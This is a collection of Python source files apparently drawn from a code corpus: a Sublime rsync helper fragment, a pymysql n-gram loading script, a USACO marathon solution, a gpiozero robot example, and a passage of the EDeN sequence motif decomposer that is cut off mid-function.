w = sublime.active_window()
found = sublime_api.project_by_path(w, filename)
if found is None:
return False
return sync_api.rsync_remote_file(found.get("path", ""), filename,
found.get("remotePath", ""),
found.get("remoteOptions", ""),
found.get("rsyncOptions", ""))
| 1.828125 | 2 |
insert_data.py | FourierYe/calculatepossibility | 0 | 12794288 | <filename>insert_data.py
import main
import traceback
import pymysql
if __name__ == "__main__":
# # ngram_1
# try:
# db = pymysql.connect(host='127.0.0.1',
# port=3306,
# user='root',
# password='<PASSWORD>',
# db='n_grams',
# charset='utf8')
# cursor = db.cursor()
# ngram_stop = 622009+5
# count = 0
# with open(
# '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered'
# ) as file:
# for line in file:
# count = count + 1
# if count > (622009+5):
# break
# if count >=6 and count <= (622009+5):
# ngram_2
try:
db = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='<PASSWORD>',
db='n_grams',
charset='utf8')
cursor = db.cursor()
count =0
with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file:
for line in file:
count = count +1
if count >=622017 and count <= 213054597:
content = line.split('\t')
possibility = content[0]
words = content[1]
content = words.split(' ')
under_word = content[0]
after_word = content[1]
punishment = '-99'
sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES ("%s","%s","%s","%s");'%(under_word, after_word, possibility, punishment)
cursor.execute(sql)
except Exception as ex:
db.rollback()
traceback.print_exc()
finally:
db.commit()
cursor.close()
db.close() | 2.625 | 3 |
2014-2015/1-dec2014/p1/Marathon.py | esqu1/USACO | 0 | 12794289 | ##########
# USACO CONTEST 1 PROBLEM 1
# SOLUTION BY <NAME>
# PYTHON 2.7.6
##########
import sys
# Reads in the file marathon.in.
def readin():
f = open("marathon.in",'r')
s = f.read().split("\n")
f.close()
return s
# Checks the supposedly "Manhattan" distance of the list.
def checkSum(L):
sum = 0
i = 0
while i < len(L) - 1:
sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1])
i+= 1
return sum
#Main function
def main():
l = readin()
checkpoints = []
i = 1
while i <= int(l[0]): #makes checkpoints into a 2D list
temp = l[i].split()
temp = [int(el) for el in temp]
checkpoints.append(temp)
i+= 1
i = 1
total = checkSum(checkpoints)
min = total
while i < int(l[0]) - 1:
total1 = total
total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1]))
total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1]))
# The way this works: take the original total, and subtract the distances to and from a certain checkpoint. Then add the distance between the checkpoints before and after. This will take care of the missing checkpoint Bessie skips.
if total1 < min:
min = total1
i+= 1
g = open("marathon.out",'w')
g.write(str(min) + "\n")
g.close()
main()
| 3.765625 | 4 |
docs/examples/robot_motion_1.py | codecademy-engineering/gpiozero | 743 | 12794290 | from gpiozero import Robot, Motor, MotionSensor
from signal import pause
robot = Robot(left=Motor(4, 14), right=Motor(17, 18))
pir = MotionSensor(5)
pir.when_motion = robot.forward
pir.when_no_motion = robot.stop
pause()
| 2.703125 | 3 |
eden/sequence_motif_decomposer.py | zaidurrehman/EDeN | 0 | 12794291 | #!/usr/bin/env python
"""SequenceMotifDecomposer is a motif finder algorithm.
@author: <NAME>
@email: <EMAIL>
"""
import logging
import multiprocessing as mp
import os
from collections import defaultdict
from eden import apply_async
import numpy as np
from scipy.sparse import vstack
from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence
from itertools import izip
import time
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.linear_model import SGDClassifier
from sklearn.cluster import MiniBatchKMeans
from eden.sequence import Vectorizer
from StringIO import StringIO
from Bio import SeqIO
from Bio.Align.Applications import MuscleCommandline
from Bio.Alphabet import IUPAC
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from corebio.seq import Alphabet, SeqList
import weblogolib as wbl
from scipy.cluster.hierarchy import linkage
import regex as re
from collections import Counter
from sklearn import metrics
from eden.util.NeedlemanWunsh import edit_distance
import random
import pylab as plt
import joblib
from scipy.optimize import curve_fit
import multiprocessing
logger = logging.getLogger(__name__)
def sigmoid(x, a, b):
"""sigmoid."""
return 1 / (1 + np.exp(-(x - a) / b))
class PValueEvaluator(object):
"""Fit a parametrized sigmoid on the empirical cumulative distribution."""
def __init__(self, random_state=1):
"""Constructor."""
self.random_state = random_state
self.a = -4
self.b = 1
def ecdf(self, x):
"""Empirical cumulative distribution function."""
xs = np.sort(x)
ys = np.arange(1, len(xs) + 1) / float(len(xs))
return xs, ys
def fit(self, scores):
"""fit."""
if scores:
xs, ys = self.ecdf(scores)
popt, pcov = curve_fit(sigmoid, xs, ys)
self.a, self.b = popt
else:
logger.debug('Warning: reverting to default values')
logger.debug('ECDF fit on %d values' % (len(scores)))
logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b))
def predict(self, value):
"""pvalue."""
y = sigmoid(value, self.a, self.b)
p_val = 1 - y
return p_val
def ecdf(x):
"""Empirical cumulative distribution function."""
xs = np.sort(x)
ys = np.arange(1, len(xs) + 1) / float(len(xs))
return xs, ys
def letter_regex(k, size, regex_th=0.3):
"""letter_regex."""
code = []
for letter, count in k:
if count / float(size) > regex_th:
if letter != '-':
code.append(letter)
if len(code) == 0:
code_str = None
elif len(code) == 1:
code_str = code[0]
else:
code_str = '(' + '|'.join(code) + ')'
return code_str
def consensus_regex(trimmed_align_seqs, regex_th):
"""consensus_regex."""
cluster = []
for h, align_seq in trimmed_align_seqs:
str_list = [c for c in align_seq]
concat_str = np.array(str_list, dtype=np.dtype('a'))
cluster.append(concat_str)
cluster = np.vstack(cluster)
size = len(trimmed_align_seqs)
for i, row in enumerate(cluster.T):
c = Counter(row)
k = c.most_common()
code = ''
for i, row in enumerate(cluster.T):
c = Counter(row)
k = c.most_common()
l = letter_regex(k, size, regex_th=regex_th)
if l:
code += l
return code
def find_occurrences(needle, haystack):
"""find_occurrences."""
for h, s in haystack:
matches = re.findall(needle, s, overlapped=True)
if len(matches):
yield 1
else:
yield 0
def occurrences(needle, haystack):
"""occurrences."""
counts = sum(find_occurrences(needle, haystack))
size = len(haystack)
return counts, float(counts) / size
def extract_consensus(seqs, motives, regex_th):
"""extract_consensus."""
for id in motives:
c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th)
counts, freq = occurrences(c_regex, seqs)
yield freq, id, c_regex, counts, motives[id]['consensus_seq']
def plot_location(needle, haystack,
cluster_id=None, nbins=20, size=(17, 2), fname=None):
"""plot_location."""
locs = []
for h, s in haystack:
for match in re.finditer(needle, s):
s = match.start()
e = match.end()
m = s + (e - s) / 2
locs.append(m)
plt.figure(figsize=size)
n, bins, patches = plt.hist(
locs, nbins, normed=0, facecolor='blue', alpha=0.3)
plt.grid()
plt.title(needle)
plt.xlabel('Position')
plt.ylabel('Num occurrences')
if fname:
plt.draw()
figname = '%s_loc_%d.png' % (fname, cluster_id)
plt.savefig(
figname, bbox_inches='tight', transparent=True, pad_inches=0)
else:
figname = None
plt.show()
plt.close()
return figname
def extract_location(needle, haystack):
"""extract_location."""
locs = []
for h, s in haystack:
for match in re.finditer(needle, s):
s = match.start()
e = match.end()
m = s + (e - s) / 2
locs.append(m)
if locs:
avg_loc = np.percentile(locs, 50)
std_loc = np.percentile(locs, 70) - np.percentile(locs, 30)
else:
avg_loc = -1
std_loc = 0
return avg_loc, std_loc
def hits(motives, ids=None):
"""hits."""
for i in ids:
for h, s in motives[i]['seqs']:
tokens = h.split('<loc>')
seq_id = tokens[0]
begin, end = tokens[1].split(':')
yield (seq_id, int(begin), int(end), i)
def compute_cooccurence(motives, ids=None):
"""compute_cooccurence."""
if ids is None:
ids = [id for id in motives]
seqs_summary = defaultdict(list)
for seq_id, begin, end, i in hits(motives, ids=ids):
seqs_summary[seq_id].append((begin, end, i))
distances = defaultdict(list)
size = max(id for id in motives) + 1
cooccurence_mtx = np.zeros((size, size))
for seq_id in sorted(seqs_summary):
cluster_ids = [cluster_id
for begin, end, cluster_id in seqs_summary[seq_id]]
centers = defaultdict(list)
for begin, end, cluster_id in seqs_summary[seq_id]:
centers[cluster_id].append(begin + (end - begin) / 2)
cluster_ids = set(cluster_ids)
for i in cluster_ids:
for j in cluster_ids:
cooccurence_mtx[i, j] += 1
if i != j:
# find closest instance j from any instance in i
d_ij = []
for c_i in centers[i]:
for c_j in centers[j]:
d_ij.append(abs(c_i - c_j))
selected_abs = min(d_ij)
for c_i in centers[i]:
for c_j in centers[j]:
if selected_abs == abs(c_i - c_j):
selected = c_i - c_j
distances[(i, j)].append(selected)
cooccurence_mtx = np.nan_to_num(cooccurence_mtx)
orig_cooccurence_mtx = cooccurence_mtx.copy()
cooccurence_list = []
for i, row in enumerate(cooccurence_mtx):
norm = row[i]
if norm != 0:
row /= norm
else:
row = np.zeros(row.shape)
row[i] = 0
cooccurence_list.append(row)
norm_cooccurence_mtx = np.vstack(cooccurence_list)
return orig_cooccurence_mtx, norm_cooccurence_mtx, distances
def plot_distance(cluster_id_i,
cluster_id_j,
regex_i,
regex_j,
distances,
nbins=5,
size=(6, 2),
fname=None):
"""plot_distance."""
ds = distances[(cluster_id_i, cluster_id_j)]
plt.figure(figsize=size)
n, bins, patches = plt.hist(
ds, nbins, normed=0, facecolor='green', alpha=0.3)
plt.grid()
plt.title('%s vs %s' % (regex_i, regex_j))
plt.xlabel('Relative position')
plt.ylabel('Num occurrences')
if fname:
plt.draw()
figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j)
plt.savefig(
figname, bbox_inches='tight', transparent=True, pad_inches=0)
else:
figname = None
plt.show()
plt.close()
return figname
def mean_shift_decomposition(sig, half_windw_size=5):
"""mean_shift_decomposition."""
sig_len = len(sig)
for i in range(half_windw_size, sig_len - half_windw_size):
min_sig = np.min(sig[i - half_windw_size:i + half_windw_size])
if min_sig == sig[i]:
yield i
def box_decomposition(sig, half_windw_size=5):
"""box_decomposition."""
ids = list(mean_shift_decomposition(sig, half_windw_size))
for i in range(len(ids) - 1):
start = ids[i]
end = ids[i + 1]
width = end - start
val = sum(sig[start:end])
yield val, start, end, width
def cumulative_score(seqs, smod):
"""cumulative_score."""
median_len = np.median([len(s) for h, s in seqs])
sigs = None
for scores in smod.score(seqs):
sig = np.array(scores)
if len(sig) != median_len:
logger.debug('Length mismatch: %d != %d' % (len(sig), median_len))
if sigs is None:
if len(sig) >= median_len:
sigs = sig[:median_len]
else:
if len(sig) >= median_len:
sigs = sigs + sig[:median_len]
sig = np.array(sigs) / float(len(seqs))
return sig
def trim_seqs(seqs, smod, half_windw_size=7):
"""trim_seqs."""
sig = cumulative_score(seqs, smod)
val, start, end, width = max(box_decomposition(sig, half_windw_size))
logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width))
for h, s in seqs:
if s[start:end]:
yield (h, s[start:end])
def plot_cumulative_score(smod,
seqs,
size=(6, 2),
fname=None):
"""plot_cumulative_score."""
sig = cumulative_score(seqs, smod)
plt.figure(figsize=size)
sigp = np.copy(sig)
sigp[sigp < 0] = 0
plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g')
sign = np.copy(sig)
sign[sign >= 0] = 0
plt.bar(range(len(sign)), sign, alpha=0.3, color='r')
plt.grid()
plt.xlabel('Position')
plt.ylabel('Importance score')
if fname:
plt.draw()
figname = '%s_importance.png' % (fname)
plt.savefig(
figname, bbox_inches='tight', transparent=True, pad_inches=0)
else:
figname = None
plt.show()
plt.close()
return figname
# ------------------------------------------------------------------------------
def serial_pre_process(iterable, vectorizer=None):
"""serial_pre_process."""
data_matrix = vectorizer.transform(iterable)
return data_matrix
def chunks(iterable, n):
"""chunks."""
iterable = iter(iterable)
while True:
items = []
for i in range(n):
it = iterable.next()
items.append(it)
yield items
def multiprocess_vectorize(iterable,
vectorizer=None,
pos_block_size=100,
n_jobs=-1):
"""multiprocess_vectorize."""
start_time = time.time()
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(iterable, pos_block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Vectorizing')
start_time = time.time()
matrices = []
for i, p in enumerate(results):
loc_start_time = time.time()
pos_data_matrix = p.get()
matrices += pos_data_matrix
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
size = pos_data_matrix.shape
logger.debug('%d %s (%.2f secs) (delta: %.2f)' %
(i, size, d_time, d_loc_time))
pool.close()
pool.join()
data_matrix = vstack(matrices)
return data_matrix
def multiprocess_fit(pos_iterable, neg_iterable,
vectorizer=None,
estimator=None,
pos_block_size=100,
neg_block_size=100,
n_jobs=-1):
"""multiprocess_fit."""
start_time = time.time()
classes = np.array([1, -1])
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
pos_results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(pos_iterable, pos_block_size)]
neg_results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(neg_iterable, neg_block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Fitting')
start_time = time.time()
for i, (p, n) in enumerate(izip(pos_results, neg_results)):
loc_start_time = time.time()
pos_data_matrix = p.get()
y = [1] * pos_data_matrix.shape[0]
neg_data_matrix = n.get()
y += [-1] * neg_data_matrix.shape[0]
y = np.array(y)
data_matrix = vstack([pos_data_matrix, neg_data_matrix])
estimator.partial_fit(data_matrix, y, classes=classes)
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
size = pos_data_matrix.shape
logger.debug('%d %s (%.2f secs) (delta: %.2f)' %
(i, size, d_time, d_loc_time))
pool.close()
pool.join()
return estimator
def multiprocess_performance(pos_iterable, neg_iterable,
vectorizer=None,
estimator=None,
pos_block_size=100,
neg_block_size=100,
n_jobs=-1):
"""multiprocess_performance."""
start_time = time.time()
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
pos_results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(pos_iterable, pos_block_size)]
neg_results = [apply_async(
pool, serial_pre_process,
args=(seqs, vectorizer))
for seqs in chunks(neg_iterable, neg_block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Performance evaluation')
start_time = time.time()
preds = []
binary_preds = []
true_targets = []
for i, (p, n) in enumerate(izip(pos_results, neg_results)):
loc_start_time = time.time()
pos_data_matrix = p.get()
y = [1] * pos_data_matrix.shape[0]
neg_data_matrix = n.get()
y += [-1] * neg_data_matrix.shape[0]
y = np.array(y)
true_targets.append(y)
data_matrix = vstack([pos_data_matrix, neg_data_matrix])
pred = estimator.decision_function(data_matrix)
preds.append(pred)
binary_pred = estimator.predict(data_matrix)
binary_preds.append(binary_pred)
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
size = pos_data_matrix.shape
logger.debug('%d %s (%.2f secs) (delta: %.2f)' %
(i, size, d_time, d_loc_time))
pool.close()
pool.join()
preds = np.hstack(preds)
binary_preds = np.hstack(binary_preds)
true_targets = np.hstack(true_targets)
return preds, binary_preds, true_targets
def serial_subarray(iterable,
vectorizer=None,
estimator=None,
min_subarray_size=5,
max_subarray_size=10):
"""serial_subarray."""
annotated_seqs = vectorizer.annotate(iterable, estimator=estimator)
subarrays_items = []
for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs):
subarrays = compute_max_subarrays_sequence(
seq=seq, score=score,
min_subarray_size=min_subarray_size,
max_subarray_size=max_subarray_size,
margin=1,
output='all')
subseqs = []
for subarray in subarrays:
subseq_seq = subarray['subarray_string']
begin = subarray['begin']
end = subarray['end']
score = subarray['score']
header = orig_header
header += '<loc>%d:%d<loc>' % (begin, end)
header += '<score>%.4f<score>' % (score)
header += '<subseq>%s<subseq>' % (subseq_seq)
subseq = (header, seq)
subseqs.append(subseq)
subarrays_items += subseqs
return subarrays_items
def multiprocess_subarray(iterable,
vectorizer=None,
estimator=None,
min_subarray_size=5,
max_subarray_size=10,
block_size=100,
n_jobs=-1):
"""multiprocess_subarray."""
start_time = time.time()
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
results = [apply_async(
pool, serial_subarray,
args=(seqs,
vectorizer,
estimator,
min_subarray_size,
max_subarray_size))
for seqs in chunks(iterable, block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Annotating')
start_time = time.time()
subarrays_items = []
for i, p in enumerate(results):
loc_start_time = time.time()
subarrays_item = p.get()
subarrays_items += subarrays_item
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
logger.debug('%d (%.2f secs) (delta: %.2f)' %
(i, d_time, d_loc_time))
pool.close()
pool.join()
return subarrays_items
def serial_score(iterable,
vectorizer=None,
estimator=None):
"""serial_score."""
annotated_seqs = vectorizer.annotate(iterable, estimator=estimator)
scores = [score for seq, score in annotated_seqs]
return scores
def multiprocess_score(iterable,
vectorizer=None,
estimator=None,
block_size=100,
n_jobs=-1):
"""multiprocess_score."""
start_time = time.time()
if n_jobs == -1:
pool = mp.Pool()
else:
pool = mp.Pool(n_jobs)
results = [apply_async(
pool, serial_score,
args=(seqs,
vectorizer,
estimator))
for seqs in chunks(iterable, block_size)]
logger.debug('Setup %.2f secs' % (time.time() - start_time))
logger.debug('Predicting')
start_time = time.time()
scores_items = []
for i, p in enumerate(results):
loc_start_time = time.time()
scores = p.get()
scores_items += scores
d_time = time.time() - start_time
d_loc_time = time.time() - loc_start_time
logger.debug('%d (%.2f secs) (delta: %.2f)' %
(i, d_time, d_loc_time))
pool.close()
pool.join()
return scores_items
# ------------------------------------------------------------------------------
def _fasta_to_fasta(lines):
seq = ""
for line in lines:
if line:
if line[0] == '>':
if seq:
yield seq
seq = ""
line_str = str(line)
yield line_str.strip()
else:
line_str = line.split()
if line_str:
seq += str(line_str[0]).strip()
if seq:
yield seq
# ------------------------------------------------------------------------------
class MuscleAlignWrapper(object):
"""A wrapper to perform Muscle Alignment on sequences."""
def __init__(self,
diags=False,
maxiters=16,
maxhours=None,
# TODO: check if this alphabet is required
# it over-rides tool.alphabet
alphabet='dna', # ['dna', 'rna', 'protein']
):
"""Initialize an instance."""
self.diags = diags
self.maxiters = maxiters
self.maxhours = maxhours
if alphabet == 'protein':
self.alphabet = IUPAC.protein
elif alphabet == 'rna':
self.alphabet = IUPAC.unambiguous_rna
else:
self.alphabet = IUPAC.unambiguous_dna
def _seq_to_stdin_fasta(self, seqs):
# seperating headers
headers, instances = [list(x) for x in zip(*seqs)]
instances_seqrecord = []
for i, j in enumerate(instances):
instances_seqrecord.append(
SeqRecord(Seq(j, self.alphabet), id=str(i)))
handle = StringIO()
SeqIO.write(instances_seqrecord, handle, "fasta")
data = handle.getvalue()
return headers, data
def _perform_ma(self, data):
params = {'maxiters': 7}
if self.diags is True:
params['diags'] = True
if self.maxhours is not None:
params['maxhours'] = self.maxhours
muscle_cline = MuscleCommandline(**params)
stdout, stderr = muscle_cline(stdin=data)
return stdout
def _fasta_to_seqs(self, headers, stdout):
out = list(_fasta_to_fasta(stdout.split('\n')))
motif_seqs = [''] * len(headers)
for i in range(len(out[:-1]))[::2]:
id = int(out[i].split(' ')[0].split('>')[1])
motif_seqs[id] = out[i + 1]
return zip(headers, motif_seqs)
def transform(self, seqs=[]):
"""Carry out alignment."""
headers, data = self._seq_to_stdin_fasta(seqs)
stdout = self._perform_ma(data)
aligned_seqs = self._fasta_to_seqs(headers, stdout)
return aligned_seqs
# ------------------------------------------------------------------------------
class Weblogo(object):
"""A wrapper of weblogolib for creating sequence."""
def __init__(self,
output_format='png', # ['eps','png','png_print','jpeg']
stacks_per_line=40,
sequence_type='dna', # ['protein','dna','rna']
ignore_lower_case=False,
# ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability']
units='bits',
first_position=1,
logo_range=list(),
# composition = 'auto',
scale_stack_widths=True,
error_bars=True,
title='',
figure_label='',
show_x_axis=True,
x_label='',
show_y_axis=True,
y_label='',
y_axis_tic_spacing=1.0,
show_ends=False,
# ['auto','base','pairing','charge','chemistry','classic','monochrome']
color_scheme='classic',
resolution=96,
fineprint='',
):
"""Initialize an instance."""
options = wbl.LogoOptions()
options.stacks_per_line = stacks_per_line
options.sequence_type = sequence_type
options.ignore_lower_case = ignore_lower_case
options.unit_name = units
options.first_index = first_position
if logo_range:
options.logo_start = logo_range[0]
options.logo_end = logo_range[1]
options.scale_width = scale_stack_widths
options.show_errorbars = error_bars
if title:
options.title = title
if figure_label:
options.logo_label = figure_label
options.show_xaxis = show_x_axis
if x_label:
options.xaxis_label = x_label
options.show_yaxis = show_y_axis
if y_label:
options.yaxis_label = y_label
options.yaxis_tic_interval = y_axis_tic_spacing
options.show_ends = show_ends
options.color_scheme = wbl.std_color_schemes[color_scheme]
options.resolution = resolution
if fineprint:
options.fineprint = fineprint
self.options = options
self.output_format = output_format
def create_logo(self, seqs=[]):
"""Create sequence logo for input sequences."""
# seperate headers
headers, instances = [list(x)
for x in zip(*seqs)]
if self.options.sequence_type is 'rna':
alphabet = Alphabet('ACGU')
elif self.options.sequence_type is 'protein':
alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY')
else:
alphabet = Alphabet('AGCT')
motif_corebio = SeqList(alist=instances, alphabet=alphabet)
data = wbl.LogoData().from_seqs(motif_corebio)
format = wbl.LogoFormat(data, self.options)
if self.output_format == 'png':
return wbl.png_formatter(data, format)
elif self.output_format == 'png_print':
return wbl.png_print_formatter(data, format)
elif self.output_format == 'jpeg':
return wbl.jpeg_formatter(data, format)
else:
return wbl.eps_formatter(data, format)
# ------------------------------------------------------------------------------
class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin):
"""SequenceMotifDecomposer."""
def __init__(self,
complexity=5,
n_clusters=10,
min_subarray_size=4,
max_subarray_size=10,
estimator=SGDClassifier(warm_start=True),
class_estimator=SGDClassifier(),
clusterer=MiniBatchKMeans(),
pos_block_size=300,
neg_block_size=300,
n_jobs=-1):
"""Construct."""
self.complexity = complexity
self.n_clusters = n_clusters
self.min_subarray_size = min_subarray_size
self.max_subarray_size = max_subarray_size
self.pos_block_size = pos_block_size
self.neg_block_size = neg_block_size
self.n_jobs = n_jobs
self.vectorizer = Vectorizer(complexity=complexity,
auto_weights=True,
nbits=15)
self.estimator = estimator
self.class_estimator = class_estimator
self.clusterer = clusterer
self.clusterer_is_fit = False
def save(self, model_name):
"""save."""
joblib.dump(self, model_name, compress=1)
def load(self, obj):
"""load."""
self.__dict__.update(joblib.load(obj).__dict__)
def fit(self, pos_seqs=None, neg_seqs=None):
"""fit."""
try:
self.estimator = multiprocess_fit(
pos_seqs, neg_seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
pos_block_size=self.pos_block_size,
neg_block_size=self.neg_block_size,
n_jobs=self.n_jobs)
self.fit_decomposition(neg_seqs)
return self
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def performance(self, pos_seqs=None, neg_seqs=None):
"""performance."""
try:
y_pred, y_binary, y_test = multiprocess_performance(
pos_seqs, neg_seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
pos_block_size=self.pos_block_size,
neg_block_size=self.neg_block_size,
n_jobs=self.n_jobs)
# confusion matrix
cm = metrics.confusion_matrix(y_test, y_binary)
np.set_printoptions(precision=2)
logger.info('Confusion matrix:')
logger.info(cm)
# classification
logger.info('Classification:')
logger.info(metrics.classification_report(y_test, y_binary))
# roc
logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred)))
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def _decompose_header(self, header):
score = header.split('<score>')[1]
score = float(score)
loc = header.split('<loc>')[1]
begin, end = loc.split(':')
begin = int(begin)
end = int(end)
subseq = header.split('<subseq>')[1]
orig_header = header.split('<loc>')[0]
return orig_header, score, begin, end, subseq
def decompose(self, seqs=None, p_value=0.05):
"""decomposition_scores."""
try:
subarrays_items = multiprocess_subarray(
seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
min_subarray_size=self.min_subarray_size,
max_subarray_size=self.max_subarray_size,
block_size=self.pos_block_size,
n_jobs=self.n_jobs)
for header, seq in subarrays_items:
components = self._decompose_header(header)
orig_header, score, begin, end, subseq = components
p = self.compute_p_value(score)
if p <= p_value:
yield orig_header, begin, end, p, subseq
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def decomposition_scores(self, seqs=None):
"""decomposition_scores."""
try:
subarrays_items = multiprocess_subarray(
seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
min_subarray_size=self.min_subarray_size,
max_subarray_size=self.max_subarray_size,
block_size=self.pos_block_size,
n_jobs=self.n_jobs)
for header, seq in subarrays_items:
yield self._decompose_header(header)
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def fit_decomposition(self, seqs=None):
"""fit_decomposition."""
self.a, self.b = -4, 1
scores = [score for header, score, begin, end, subseq in
self.decomposition_scores(seqs)]
if scores:
xs, ys = ecdf(scores)
popt, pcov = curve_fit(sigmoid, xs, ys)
self.a, self.b = popt
else:
logger.debug('Warning: reverting to default values')
logger.debug('ECDF fit on %d values' % (len(scores)))
logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b))
def compute_p_value(self, value):
"""p_value."""
y = sigmoid(value, self.a, self.b)
p_val = 1 - y
return p_val
def compute_clusters(self, seqs=None, p_value=0.05):
"""compute_clusters."""
try:
subsequences = []
iterable = self.decompose(seqs, p_value=p_value)
for header, begin, end, p, subseq in iterable:
new_header = header
new_header += '<loc>' + str(begin) + ':'
new_header += str(end) + '<loc>'
subsequences.append((new_header, subseq))
if not subsequences:
raise Exception('No subarray was selected. Increase p_value.')
logger.debug('Working on: %d fragments' % len(subsequences))
n = multiprocessing.cpu_count()
pos_block_size = len(subsequences) / n
data_matrix = multiprocess_vectorize(
subsequences,
vectorizer=self.vectorizer,
pos_block_size=pos_block_size,
n_jobs=self.n_jobs)
logger.debug('Clustering')
logger.debug('working on %d instances' % data_matrix.shape[0])
start_time = time.time()
self.clusterer.set_params(n_clusters=self.n_clusters)
if self.clusterer_is_fit:
preds = self.class_estimator.predict(data_matrix)
else:
preds = self.clusterer.fit_predict(data_matrix)
self.class_estimator.fit(data_matrix, preds)
self.clusterer_is_fit = True
dtime = time.time() - start_time
logger.debug('...done in %.2f secs' % (dtime))
self.clusters = defaultdict(list)
for pred, seq in zip(preds, subsequences):
self.clusters[pred].append(seq)
logger.debug('After clustering, %d motives' % len(self.clusters))
return self.clusters
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def score(self, seqs=None):
"""fit."""
try:
for score in multiprocess_score(seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
block_size=self.pos_block_size,
n_jobs=self.n_jobs):
yield score
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def _order_clusters(self, clusters, complexity=3):
sep = ' ' * (complexity * 2)
# join all sequences in a cluster with enough space that
# kmers dont interfere
cluster_seqs = []
for cluster_id in clusters:
if len(clusters[cluster_id]) > 0:
seqs = [s for h, s in clusters[cluster_id]]
seq = sep.join(seqs)
cluster_seqs.append(seq)
# vectorize the seqs and compute their gram matrix K
cluster_vecs = Vectorizer(complexity).transform(cluster_seqs)
gram_matrix = metrics.pairwise.pairwise_kernels(
cluster_vecs, metric='linear')
c = linkage(gram_matrix, method='single')
orders = []
for id1, id2 in c[:, 0:2]:
if id1 < len(cluster_seqs):
orders.append(int(id1))
if id2 < len(cluster_seqs):
orders.append(int(id2))
return orders
def _compute_consensus_seq(self, align_seqs):
cluster = []
for h, align_seq in align_seqs:
str_list = [c for c in align_seq]
concat_str = np.array(str_list, dtype=np.dtype('a'))
cluster.append(concat_str)
cluster = np.vstack(cluster)
seq = ''
for i, row in enumerate(cluster.T):
c = Counter(row)
k = c.most_common()
seq += k[0][0]
return seq
def _compute_score(self, align_seqs, min_freq=0.8):
dim = len(align_seqs)
cluster = []
for h, align_seq in align_seqs:
str_list = [c for c in align_seq]
concat_str = np.array(str_list, dtype=np.dtype('a'))
cluster.append(concat_str)
cluster = np.vstack(cluster)
score = 0
to_be_removed = []
for i, row in enumerate(cluster.T):
c = Counter(row)
k = c.most_common()
if k[0][0] == '-':
to_be_removed.append(i)
val = k[1][1]
else:
val = k[0][1]
if float(val) / dim >= min_freq:
score += 1
trimmed_align_seqs = []
for h, align_seq in align_seqs:
trimmed_align_seq = [a for i, a in enumerate(align_seq)
if i not in to_be_removed]
trimmed_align_seqs.append((h, ''.join(trimmed_align_seq)))
return score, trimmed_align_seqs
def _is_high_quality(self,
seqs,
min_score=4,
min_freq=0.6,
min_cluster_size=10,
sample_size=200):
ma = MuscleAlignWrapper(alphabet='rna')
if len(seqs) > sample_size:
sample_seqs = random.sample(seqs, sample_size)
else:
sample_seqs = seqs
align_seqs = ma.transform(seqs=sample_seqs)
score, trimmed_align_seqs = self._compute_score(align_seqs,
min_freq=min_freq)
if score >= min_score and len(align_seqs) > min_cluster_size:
return True
else:
return False
def compute_motif(self,
seqs=None,
min_score=4,
min_freq=0.6,
min_cluster_size=10,
regex_th=.3,
sample_size=200):
"""compute_motif."""
ma = MuscleAlignWrapper(alphabet='rna')
